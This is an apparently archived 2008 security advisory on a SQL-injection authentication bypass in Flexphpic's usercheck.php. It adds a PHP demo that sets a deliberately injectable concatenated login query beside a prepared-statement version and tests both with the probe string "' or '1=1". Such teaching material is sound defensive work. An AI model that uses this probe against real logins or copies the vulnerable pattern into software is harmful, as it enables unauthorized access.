Vendor: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
By: S.W.A.T.
CVSS: 9 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Affected Version From: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Affected Version To: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:flexphpic:flexphpic:0.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Flexphpic 0.0.4 & Flexphpic Pro 0.0.3 – ' or '1=1 SQL Injection Vulnerability
A vulnerability exists in Flexphpic 0.0.4 & Flexphpic Pro 0.0.3 due to improper sanitization of user-supplied input in the 'username' and 'password' parameters of the 'usercheck.php' script. An attacker can exploit this vulnerability to inject arbitrary SQL code into the application, allowing them to bypass authentication and gain access to the application.
Mitigation:
Ensure that user-supplied input is properly sanitized before being used in SQL queries.
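
The mitigation above, shown as an added example that is not Flexphpic's own code: a login check built by string concatenation beside one that binds the username as a parameter and verifies the password against a stored hash. The `users` table, its columns, the function names and the in-memory SQLite database (which needs the `pdo_sqlite` extension) are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database standing in for the application's user table.
// Table and column names are hypothetical, not taken from Flexphpic.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$ins = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Weak pattern: request values are concatenated into the SQL text, so a quote
// character in either field changes the structure of the WHERE clause.
// (It compares against the hash column only so one constructed table serves both functions.)
function check_login_concat(PDO $pdo, string $username, string $password): bool
{
    $sql = "SELECT COUNT(*) FROM users "
         . "WHERE username = '$username' AND password_hash = '$password'";
    return (int) $pdo->query($sql)->fetchColumn() > 0;
}

// Hardened pattern: the username is bound as data, and the password never
// enters the query; it is checked against the stored hash in PHP.
function check_login_prepared(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

$probe = "' or '1=1"; // the string from the advisory title

// Compare how each function treats the same inputs.
var_dump(check_login_concat($pdo, 'admin', $probe));
var_dump(check_login_prepared($pdo, 'admin', $probe));
var_dump(check_login_prepared($pdo, 'admin', 'correct horse'));
```

With bound parameters the input is never parsed as SQL, so no escaping or filtering step is needed for the query to keep its structure.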